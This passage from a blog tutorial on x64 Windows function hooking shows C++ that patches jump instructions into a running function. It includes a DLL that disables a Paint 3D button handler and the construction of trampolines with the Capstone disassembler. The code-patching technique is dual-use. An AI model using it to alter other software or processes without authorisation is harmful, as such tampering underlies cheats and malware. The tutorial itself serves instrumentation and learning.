<span class="kt">uint8_t</span> <span class="n">absJumpInstructions</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xE2</span> <span class="p">};</span>
<span class="kt">uint64_t</span> <span class="n">addrToJumpTo64</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">addrToJumpTo</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">absJumpInstructions</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">addrToJumpTo64</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">addrToJumpTo64</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">absJumpMemory</span><span class="p">,</span> <span class="n">absJumpInstructions</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">absJumpInstructions</span><span class="p">));</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">InstallHook</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">targetFunction</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">payloadFunction</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span> <span class="o">=</span> <span class="n">targetFunction</span><span class="p">;</span> <span class="c1">//the caller supplies the address (see GetFunc2HookAddr)</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">relayFuncMemory</span> <span class="o">=</span> <span class="n">AllocatePageNearAddress</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">relayFuncMemory</span><span class="p">,</span> <span class="n">payloadFunction</span><span class="p">);</span> <span class="c1">//write relay func instructions</span>
<span class="c1">//now that the relay function is built, we need to install the E9 jump into the target func,</span>
<span class="c1">//this will jump to the relay function</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="n">VirtualProtect</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">relAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">relayFuncMemory</span> <span class="o">-</span> <span class="p">((</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relAddr</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="c1">//install the hook</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="p">}</span>
<span class="kt">void</span><span class="o">*</span> <span class="nf">GetFunc2HookAddr</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">uint64_t</span> <span class="n">functionRVA</span> <span class="o">=</span> <span class="mh">0x6C6F0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">func2HookAddr</span> <span class="o">=</span> <span class="n">GetBaseModuleForProcess</span><span class="p">()</span> <span class="o">+</span> <span class="n">functionRVA</span><span class="p">;</span>
<span class="k">return</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">func2HookAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">NullPaint3DButtonHandler</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">BOOL</span> <span class="n">WINAPI</span> <span class="nf">DllMain</span><span class="p">(</span><span class="n">HINSTANCE</span> <span class="n">hinstDLL</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">ul_reason_for_call</span><span class="p">,</span> <span class="n">LPVOID</span> <span class="n">lpvReserved</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ul_reason_for_call</span> <span class="o">==</span> <span class="n">DLL_PROCESS_ATTACH</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">InstallHook</span><span class="p">(</span><span class="n">GetFunc2HookAddr</span><span class="p">(),</span> <span class="n">NullPaint3DButtonHandler</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
</details></div>
<h2 id="function-hooking-for-big-kids">Function Hooking for Big Kids</h2>
<p>The previous examples <em>technically</em> hooked a couple functions, but did so at the cost of destroying their original functionality. This meant that we couldn’t do things like modify function arguments being passed to the original functions, or add logging while preserving the original logic of the hooked programs. Real function hooking doesn’t have to make this trade, and our next two examples won’t either.</p>
<p>So far, the hooks we’ve created have had 3 parts: the hooked function, the relay function, and the hook payload. Now we need to add another step in this process, called a trampoline. With this new step, our hook process looks like this:</p>
<div align="center">
<img src="/images/post_images/2020-11-13/trampoline2.PNG" />
<br /><br />
</div>
<p>Rather than simply replace the initial instructions in the hooked function, we’re going to use those instructions to build a trampoline that we can call from a payload function when we want to execute the original version of the hooked function. A hook payload that uses a trampoline might look like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span><span class="p">(</span><span class="o">*</span><span class="n">AddColorsTrampoline</span><span class="p">)(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">left</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">right</span><span class="p">);</span>
<span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="nf">AddColorHookPayload</span><span class="p">(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">left</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">right</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//perform some new action</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Hook executed</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="c1">//replace one of the arguments being used to call</span>
<span class="c1">//the hooked function</span>
<span class="k">return</span> <span class="n">AddColorsTrampoline</span><span class="p">(</span><span class="mh">0xFFFF0000</span><span class="p">,</span> <span class="n">right</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>At a super high level, trampolines need to do two things:</p>
<ol>
<li>Execute the instructions that were overwritten when the hook jmp was installed in the hooked function.</li>
<li>Jump back to the body of the hooked function AFTER the installed jump instruction, so that the rest of the function can continue like normal.</li>
</ol>
<p>The first item on this list is really easy to get working for contrived cases, but really difficult to get right for real world use. Consider the following assembly (shown with the addresses of the instructions on the left):</p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">EasyCase:
00007FF7F2691FF0 48 89 4C 24 08 mov qword ptr [rsp+8],rcx
00007FF7F2691FF5 55 push rbp
00007FF7F2691FF6 57 push rdi
00007FF7F2691FF7 48 81 EC 08 01 00 00 sub rsp,108h
00007FF7F2691FFE 48 8D 6C 24 20 lea rbp,[rsp+20h]
[Rest of function omitted]</code></pre></figure>
<p>This is an example of the “easy” case for creating a trampoline. The first 5 bytes of the function belong to one instruction, and that instruction doesn’t rely on any rip-relative addressing. All we need to do to make a trampoline for this function is copy the first 5 bytes to a buffer before we overwrite them with our hook, and then add a jump to 00007FF7F2691FF5 (the address of the next intact instruction) immediately after it. In assembly, this might look like this:</p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">Trampoline:
48 89 4C 24 08 mov qword ptr [rsp+8],rcx
49 BA F5 1F 69 F2 F7 7F 00 00 mov r10,7FF7F2691FF5h
41 FF E2 jmp r10 </code></pre></figure>
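<p>To make that a bit more concrete, here’s a minimal sketch of building the easy-case trampoline in C++. It only writes bytes into a plain buffer (it doesn’t hook anything), and BuildEasyTrampoline() and WriteAbsJump() are names made up for this illustration rather than functions from the example project. WriteAbsJump() is assumed to emit the same mov r10 / jmp r10 pair shown above.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++">#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Hypothetical helper: writes "mov r10, imm64; jmp r10" (13 bytes) into dst
// and returns the number of bytes written.
size_t WriteAbsJump(uint8_t* dst, uint64_t target)
{
    uint8_t code[] = { 0x49, 0xBA, 0, 0, 0, 0, 0, 0, 0, 0, //mov r10, imm64
                       0x41, 0xFF, 0xE2 };                 //jmp r10
    memcpy(&code[2], &target, sizeof(target));
    memcpy(dst, code, sizeof(code));
    return sizeof(code);
}

// Hypothetical helper: builds an "easy case" trampoline in out.
// stolen/numStolen are the whole instructions copied from the start of the
// hooked function, and funcAddr is the address those bytes were copied from.
// Returns the size of the trampoline in bytes.
size_t BuildEasyTrampoline(uint8_t* out, const uint8_t* stolen, size_t numStolen, uint64_t funcAddr)
{
    assert(numStolen >= 5); //the hook jmp overwrites 5 bytes
    memcpy(out, stolen, numStolen);
    //jump back to the first instruction that the hook jmp leaves intact
    return numStolen + WriteAbsJump(out + numStolen, funcAddr + numStolen);
}</code></pre></figure>
<p>Fed the five bytes of the mov from EasyCase and the function’s address (00007FF7F2691FF0), this should produce the same 18 bytes as the Trampoline listing above. Note that this only works when none of the stolen instructions are position dependent, which is exactly what makes the case “easy”.</p>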
<p>Functions that are harder to hook with a trampoline might have multiple instructions contained in their first 5 bytes, or use instructions with relative operands, like jumps or rip-relative addresses. The snippet below shows an example of a function that has some of these issues.</p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">HardCase:
00007FF72B1F1390 85 C9 test ecx,ecx
00007FF72B1F1392 74 26 je TargetFunc+2Ah (07FF72B1F13BAh)
00007FF72B1F1394 83 F9 01 cmp ecx,1
00007FF72B1F1397 74 0C je TargetFunc+15h (07FF72B1F13A5h)
[Rest of function omitted]</code></pre></figure>
<p>In order to build a trampoline for this function, we’re going to have to get our hands dirty. First of all, we’re going to need to steal the first 7 bytes of this function instead of the first 5, so that we can execute whole instructions in our trampoline. Second, we’re going to need to do something about the je at 00007FF72B1F1392h, since it won’t make sense to do a relative jump once we relocate the instruction.</p>
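<p>The next section of this post is going to walk through how to write code that deals with these “hard” issues, but as a bit of a teaser, here’s what the trampoline for this will look like (the absolute addresses below don’t match the previous listing, presumably because they were captured in a different run of the program, but the low-order offsets 1397h and 13BAh line up):</p>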
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">HardCase_Trampoline:
85 C9 test ecx,ecx
74 10 je 000001FA4B770021 ; rewritten jump
83 F9 01 cmp ecx,1
49 BA 97 13 09 C0 F6 7F 00 00 mov r10, 7FF6C0091397h ; Jump to hooked function body
41 FF E2 jmp r10
49 BA BA 13 09 C0 F6 7F 00 00 mov r10, 7FF6C00913BAh ; Absolute Instruction Table Starts Here
41 FF E2 jmp r10 </code></pre></figure>
<p>This trampoline can be thought of as being made up of three sections (like a “jump sandwich”, which I thought was very funny when I wrote this at 5 am). It starts with the stolen bytes from the hooked function, with the relative instructions rewritten to jump to a later part of the trampoline. The meat of the sandwich is an absolute jump that goes back to the body of the hooked function (to an address <em>after</em> the jmp we installed for the hook). Finally, the bottom of the trampoline is made up of absolute jumps (or calls, if we had any) that go to the addresses that the relative jumps/calls in the stolen bytes actually want to go to.</p>
<div align="center">
<img src="/images/post_images/2020-11-13/trampoline_anatomy.PNG" />
<br /><br />
</div>
<p>Other sources refer to the absolute instruction table as a jump table, but I’m giving it a fancy name because it’s not going to contain jump instructions exclusively.</p>
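<p>If you’re wondering where the 10h in the rewritten je (74 10) comes from, it falls out of the trampoline layout: a short jump’s operand is relative to the address of the instruction <em>after</em> the jump. Here’s a small sketch of that arithmetic. ShortJumpDisplacement() is a hypothetical helper for illustration, and the offsets are measured from the start of the trampoline.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++">#include <cassert>
#include <cstddef>
#include <cstdint>

// Hypothetical helper: returns the operand byte for a 2 byte short jump
// (for example "74 xx") that sits at trampoline offset jumpOffset and should
// land on the Absolute Instruction Table entry at trampoline offset entryOffset.
uint8_t ShortJumpDisplacement(size_t jumpOffset, size_t entryOffset)
{
    const size_t shortJumpSize = 2; //opcode byte + rel8 operand
    //relative operands are measured from the end of the jump instruction
    const int64_t disp = (int64_t)entryOffset - (int64_t)(jumpOffset + shortJumpSize);
    assert(disp >= INT8_MIN && disp <= INT8_MAX); //must fit in a signed byte
    return (uint8_t)(int8_t)disp;
}</code></pre></figure>
<p>In HardCase_Trampoline, the stolen instructions take up 7 bytes and the jump back to the hooked function takes up another 13, so the Absolute Instruction Table starts at offset 20. The je sits at offset 2, so ShortJumpDisplacement(2, 20) works out to 20 - 4 = 16, or 10h.</p>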
<h2 id="example-3-building-a-trampoline-for-code-we-can-recompile">Example 3: Building a Trampoline For Code We Can Recompile</h2>
<p>We just saw the rough skeleton of the trampoline we’re going to build, now it’s time to write the code to build it. Roughly speaking, our plan of attack looks like this:</p>
<ol>
<li>“Steal” the first 5+ bytes (rounded up to the nearest whole instruction) of the function we want to hook.</li>
<li>Fix up any rip-relative addressing (like lea rcx,[rip+0xbeef]).</li>
<li>For each relative jump or call instruction, calculate the address that it originally intended to reference, and add an absolute jmp/call to that address in the Absolute Instruction Table.</li>
<li>Rewrite the relative instructions in the stolen bytes to jump to their corresponding entry in the Absolute Instruction Table.</li>
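<li>Write a jump back to the first instruction in the hooked function that we didn’t steal (the 6th byte if we stole exactly 5 bytes, later if we had to steal more) immediately after the stolen instruction bytes, to continue executing the hooked function once the trampoline ends.</li>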
</ol>
<p>These steps won’t be completed sequentially in our final program, but I’ve split them out into discrete steps to make explaining things easier.</p>
<p>For a bit of context, here’s what our final InstallHook() function is going to look like when we’re done. We’re going to be constructing a BuildTrampoline() function which will be given a pointer to some memory to write a trampoline into, and not much else. BuildTrampoline() is going to be called from a modified version of the InstallHook() function we had in our earlier example. Notice that BuildTrampoline() will also return the size, in bytes, of the trampoline that it creates.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">InstallHook</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">payloadFunc</span><span class="p">,</span> <span class="kt">void</span><span class="o">**</span> <span class="n">trampolinePtr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="n">VirtualProtect</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">hookMemory</span> <span class="o">=</span> <span class="n">AllocatePageNearAddress</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="kt">uint32_t</span> <span class="n">trampolineSize</span> <span class="o">=</span> <span class="n">BuildTrampoline</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">hookMemory</span><span class="p">);</span>
<span class="o">*</span><span class="n">trampolinePtr</span> <span class="o">=</span> <span class="n">hookMemory</span><span class="p">;</span>
<span class="c1">//create the relay function</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">relayFuncMemory</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">hookMemory</span> <span class="o">+</span> <span class="n">trampolineSize</span><span class="p">;</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">relayFuncMemory</span><span class="p">,</span> <span class="n">payloadFunc</span><span class="p">);</span> <span class="c1">//write relay func instructions</span>
<span class="c1">//install the hook</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="k">const</span> <span class="kt">int32_t</span> <span class="n">relAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int32_t</span><span class="p">)((</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">relayFuncMemory</span> <span class="o">-</span> <span class="p">((</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">)));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relAddr</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="p">}</span></code></pre></figure>
<p>The intended use case for the trampoline pointer is to allow payload functions to call trampolines like regular functions, as shown in the snippet below.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span><span class="p">(</span><span class="o">*</span><span class="n">TargetFuncTrampoline</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">float</span><span class="p">)</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">HookPayload</span><span class="p">(</span><span class="kt">int</span> <span class="n">x</span><span class="p">,</span> <span class="kt">float</span> <span class="n">y</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Hook executed</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">TargetFuncTrampoline</span><span class="p">(</span><span class="n">x</span><span class="o">+</span><span class="mi">1</span><span class="p">,</span> <span class="n">y</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>Notice that we’re going to build the trampoline in the same “near” memory that the relay function is currently being constructed in. That’s going to make dealing with the rip-relative addressing a lot easier when we get to it.</p>
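<p>The reason “near” matters is that both the E9 hook jump and rip-relative operands encode their target as a signed 32 bit displacement, so the target has to be within roughly 2GB of the instruction. The sketch below shows that calculation with a range check added. ComputeRel32() is a hypothetical helper for illustration and isn’t part of the example project.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++">#include <cassert>
#include <cstdint>

// Hypothetical helper: computes the operand for a 5 byte E9 jmp located at
// address from that should land on address to. Returns false (and leaves
// outRel untouched) if the target is too far away for a 32 bit displacement.
bool ComputeRel32(uint64_t from, uint64_t to, int32_t* outRel)
{
    assert(outRel != nullptr);
    const uint64_t jmpSize = 5; //E9 opcode + 4 byte operand
    //the displacement is relative to the address of the next instruction
    const int64_t delta = (int64_t)(to - (from + jmpSize));
    if (delta < INT32_MIN || delta > INT32_MAX)
    {
        return false;
    }
    *outRel = (int32_t)delta;
    return true;
}</code></pre></figure>
<p>Because AllocatePageNearAddress() only hands back memory close to the hooked function, a check like this should always pass for the relay function and the trampoline, but it’s a cheap way to catch mistakes if the allocation strategy ever changes.</p>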
<h3 id="step-1-stealing-instruction-bytes">Step 1: Stealing Instruction Bytes</h3>
<p>In order for our trampoline to work at all, it needs to execute the instructions that are overwritten when we install our hook. To do this, we need to “steal” these instruction bytes from our target function before overwriting them. The verb “steal” is important here - we’re not only going to copy these instruction bytes, we’re also going to replace them with 1 byte NOPs in the target function. That way we won’t wind up with any partial instructions when we install the hook jump.</p>
<p>To make sure we steal whole instructions, we need to use a disassembly library. The rest of this article is going to use the <a href="http://www.capstone-engine.org/">Capstone</a> library for all disassembly tasks. Any disassembler will do, but Capstone has some features that are going to make our life easier later on.</p>
<p>This snippet shows how to steal the instructions contained within the first 5 bytes of a target function using Capstone. The StealBytes() function returns a struct with some additional data about the stolen instructions which we’ll use later.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">struct</span> <span class="nc">X64Instructions</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">*</span> <span class="n">instructions</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numInstructions</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numBytes</span><span class="p">;</span>
<span class="p">};</span>
<span class="n">X64Instructions</span> <span class="nf">StealBytes</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">function</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">// Disassemble stolen bytes</span>
<span class="n">csh</span> <span class="n">handle</span><span class="p">;</span>
<span class="n">cs_open</span><span class="p">(</span><span class="n">CS_ARCH_X86</span><span class="p">,</span> <span class="n">CS_MODE_64</span><span class="p">,</span> <span class="o">&</span><span class="n">handle</span><span class="p">);</span>
<span class="n">cs_option</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="n">CS_OPT_DETAIL</span><span class="p">,</span> <span class="n">CS_OPT_ON</span><span class="p">);</span> <span class="c1">// we need details enabled for relocating RIP relative instrs</span>
<span class="kt">size_t</span> <span class="n">count</span><span class="p">;</span>
<span class="n">cs_insn</span><span class="o">*</span> <span class="n">disassembledInstructions</span><span class="p">;</span> <span class="c1">//allocated by cs_disasm, needs to be manually freed later</span>
<span class="n">count</span> <span class="o">=</span> <span class="n">cs_disasm</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">function</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">function</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="o">&</span><span class="n">disassembledInstructions</span><span class="p">);</span>
<span class="c1">//get the instructions covered by the first 5 bytes of the original function</span>
<span class="kt">uint32_t</span> <span class="n">byteCount</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">stolenInstrCount</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">count</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">disassembledInstructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="n">byteCount</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="n">stolenInstrCount</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">byteCount</span> <span class="o">>=</span> <span class="mi">5</span><span class="p">)</span> <span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//replace instructions in target func with NOPs</span>
<span class="n">memset</span><span class="p">(</span><span class="n">function</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="n">byteCount</span><span class="p">);</span>
<span class="n">cs_close</span><span class="p">(</span><span class="o">&</span><span class="n">handle</span><span class="p">);</span>
<span class="k">return</span> <span class="p">{</span> <span class="n">disassembledInstructions</span><span class="p">,</span> <span class="n">stolenInstrCount</span><span class="p">,</span> <span class="n">byteCount</span> <span class="p">};</span>
<span class="p">}</span></code></pre></figure>
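<p>The byte counting in that loop is easy to check in isolation. Here’s a minimal sketch of just that part, with no Capstone involved. PlanSteal and StealPlan are hypothetical names that aren’t part of the project, and the list of sizes stands in for the size field that Capstone reports for each instruction.</p>

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Result of deciding how much of a function's start to steal.
struct StealPlan
{
    uint32_t numInstructions; // whole instructions covered
    uint32_t numBytes;        // total bytes those instructions occupy
};

// Walks a list of instruction sizes (as a disassembler would report them)
// and stops at the first instruction boundary at or past minBytes.
// instrSizes is a hypothetical stand-in for Capstone's cs_insn::size values.
StealPlan PlanSteal(const std::vector<uint8_t>& instrSizes, uint32_t minBytes)
{
    assert(minBytes > 0);
    StealPlan plan = { 0, 0 };
    for (size_t i = 0; i < instrSizes.size(); ++i)
    {
        plan.numBytes += instrSizes[i];
        plan.numInstructions++;
        if (plan.numBytes >= minBytes) break;
    }
    return plan;
}
```

<p>For a function that starts with instructions of 1, 3 and 4 bytes, a 5 byte jump lands in the middle of the third instruction, so all three get stolen (8 bytes). The jump then overwrites the first 5 of those bytes and the remaining 3 stay behind as NOPs.</p>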
<p>We’ll call this function right at the start of BuildTrampoline(), so it’s about time we started writing that function too. I’ve found the most intuitive way to structure BuildTrampoline() is to create 3 pointers at the start, each pointing to the next available location in each of the three sections of our trampoline memory. Whenever we write to a location pointed to by one of these pointers, we’ll then increment the pointer by that many bytes, so each of them is always pointing to an available memory address.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">uint32_t</span> <span class="nf">BuildTrampoline</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">dstMemForTrampoline</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">X64Instructions</span> <span class="n">stolenInstrs</span> <span class="o">=</span> <span class="n">StealBytes</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">stolenByteMem</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">dstMemForTrampoline</span><span class="p">;</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">jumpBackMem</span> <span class="o">=</span> <span class="n">stolenByteMem</span> <span class="o">+</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numBytes</span><span class="p">;</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span> <span class="o">=</span> <span class="n">jumpBackMem</span> <span class="o">+</span> <span class="mi">13</span><span class="p">;</span> <span class="c1">//13 is the size of the 64 bit mov/jmp instruction pair at jumpBackMem</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numInstructions</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="c1">//perform any fixup logic to the stolen instructions here</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">);</span>
<span class="n">stolenByteMem</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//write jump back to hooked func</span>
<span class="n">free</span><span class="p">(</span><span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">);</span>
<span class="k">return</span> <span class="kt">uint32_t</span><span class="p">(</span><span class="n">absTableMem</span> <span class="o">-</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">dstMemForTrampoline</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
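<p>If the pointer juggling is hard to picture, the three sections can also be described as plain offsets from the start of the trampoline memory. This is only a sketch of the layout described above. TrampolineLayout and ComputeLayout are made-up names for illustration, and the 13 byte jump size is taken from the comment in BuildTrampoline().</p>

```cpp
#include <cassert>
#include <cstdint>

// Size of the absolute mov/jmp pair, as stated in BuildTrampoline().
const uint32_t kAbsJumpSize = 13;

// Offsets of each trampoline section, measured from the start of its memory.
struct TrampolineLayout
{
    uint32_t stolenBytesOffset; // relocated copies of the stolen instructions
    uint32_t jumpBackOffset;    // absolute jump back into the hooked function
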